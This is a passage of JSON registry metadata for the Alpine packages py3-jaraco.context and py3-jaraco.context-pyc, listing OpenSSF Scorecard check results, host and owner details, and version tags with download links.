by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.767Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-jaraco.context?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.19","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-jaraco.context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-jaraco.context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-jaraco.context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-jaraco.context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-jaraco.context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-jaraco.context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-jaraco.context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-jaraco.context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-jaraco.context/codemeta","maintainers":[{"uuid":"bribbers@disroot.org","login":null,"name":"Bart Ribbers","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","packages_count":2188,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Bart Ribbers","role":null,"created_at":"2024-08-19T23:24:21.617Z","updated_at":"2024-08-19T23:24:21.617Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/maintainers/bribbers@disroot.org/packages"}],"registry":{"name":"alpine-v3.19","url":"https://pkgs.alpinelinux.org/packages?branch=v3.19","ecosystem":"alpine","default":false,"packages_count":23031,"maintainers_count":392,"namespaces_count":2,"keywords_count":3176,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":957},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-12-20T09:51:56.346Z","updated_at":"2026-08-24T05:06:38.587Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/namespaces"}},{"id":10344640,"name":"py3-jaraco.context-pyc","ecosystem":"alpine","description":"Precompiled Python bytecode for py3-jaraco.context","homepage":"https://github.com/jaraco/jaraco.context","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":[],"namespace":"community","versions_count":1,"first_release_published_at":"2024-04-15T17:23:11.000Z","latest_release_published_at":"2024-04-15T17:23:11.000Z","latest_release_number":"5.3.0-r0","last_synced_at":"2026-03-20T14:20:15.909Z","created_at":"2024-06-11T10:02:27.175Z","updated_at":"2026-08-06T19:26:18.788Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.20/community/x86_64/py3-jaraco.context-pyc","install_command":"apk add py3-jaraco.context-pyc","documentation_url":null,"metadata":{"repository":"community","architecture":"x86_64"},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"jaraco","name":"Jason R. Coombs","uuid":"308610","kind":"user","description":"","email":"jaraco@jaraco.com","website":"https://www.jaraco.com","location":"Pittsburgh, PA, USA","twitter":"jaraco","company":null,"icon_url":"https://avatars.githubusercontent.com/u/308610?u=5b3fdef94d1b0ac7392d17643eaba029f5f13bea\u0026v=4","repositories_count":233,"last_synced_at":"2026-08-06T04:39:36.850Z","metadata":{"has_sponsors_listing":true,"funding":null},"html_url":"https://github.com/jaraco","funding_links":["https://github.com/sponsors/jaraco"],"total_stars":5439,"followers":746,"following":5,"created_at":"2022-11-02T16:21:31.721Z","updated_at":"2026-08-06T04:39:37.156Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco/repositories"},"tags":[{"name":"v6.1.2","sha":"098f39c911d4504b2c718f2ff483ae24f1c4d378","kind":"tag","published_at":"2026-03-20T22:10:56.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.2/manifests"},{"name":"v6.1.1","sha":"47979d7b6a55353170f61f3e54d17f5973cb8e1c","kind":"tag","published_at":"2026-03-07T15:43:22.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.1/manifests"},{"name":"v6.1.0","sha":"675aaf5bfb926bdafcded1b0e08ca011d6e0f599","kind":"tag","published_at":"2026-01-13T02:49:19.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.1.0/manifests"},{"name":"v6.0.2","sha":"1fe5de1e450556cc68d1d33198f8c7b8791af42d","kind":"tag","published_at":"2025-12-24T19:18:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.2/manifests"},{"name":"v6.0.1","sha":"088151eb92eaf8801d027e126d4f7a262e422424","kind":"tag","published_at":"2024-08-20T03:35:36.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.1/manifests"},{"name":"v6.0.0","sha":"d892f531d6707f46ef1981f5ca7a7309ed4d3005","kind":"tag","published_at":"2024-07-26T21:08:04.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v6.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v6.0.0/manifests"},{"name":"v5.3.0","sha":"e0e9224b3dbe6520c986bf41820f882160dd55ab","kind":"tag","published_at":"2024-04-06T22:57:11.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.3.0/manifests"},{"name":"v5.2.0","sha":"c23c888c869bfb693246f69ba512aaede5b0438b","kind":"tag","published_at":"2024-04-06T14:42:52.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"0a1e1492aef2455f60f9b4f364551f0b4926da41","kind":"tag","published_at":"2024-04-04T23:18:01.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"eb865a132d3f801335f8b46b4de2d64d4e16e4b4","kind":"tag","published_at":"2024-04-04T18:56:02.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v5.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v5.0.0/manifests"},{"name":"v4.3.0","sha":"0e0ae08919b984e3c7cffdb2106e437d0d0891c8","kind":"tag","published_at":"2023-01-19T15:28:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.3.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.3.0/manifests"},{"name":"v4.2.1","sha":"7e22446a66f13140c0cfc7df3f36c162f11f3b5a","kind":"tag","published_at":"2023-01-18T18:06:43.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.1/manifests"},{"name":"v4.2.0","sha":"5bf0042ef434aa8924a771a405ae29e4c0110c1e","kind":"tag","published_at":"2022-11-19T03:06:16.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.2.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.2.0/manifests"},{"name":"v4.1.2","sha":"c3a9b7393ed9479dab7b02a44242ae2b017c4933","kind":"tag","published_at":"2022-07-14T05:04:26.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.2","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"4d09b48ade8acc32e3453da928ad1eec5158a5a0","kind":"tag","published_at":"2021-10-31T17:18:09.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.1","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"866a1b35d416ca6855f2d068072af53cbf255cc3","kind":"tag","published_at":"2021-10-31T17:08:46.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.1.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.1.0/manifests"},{"name":"v4.0.0","sha":"23d17bf1f04b83ef34c8cd0e67d26c2e323f5a58","kind":"tag","published_at":"2021-01-29T02:38:28.000Z","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/v4.0.0","html_url":"https://github.com/jaraco/jaraco.context/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/jaraco/jaraco.context@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags/v4.0.0/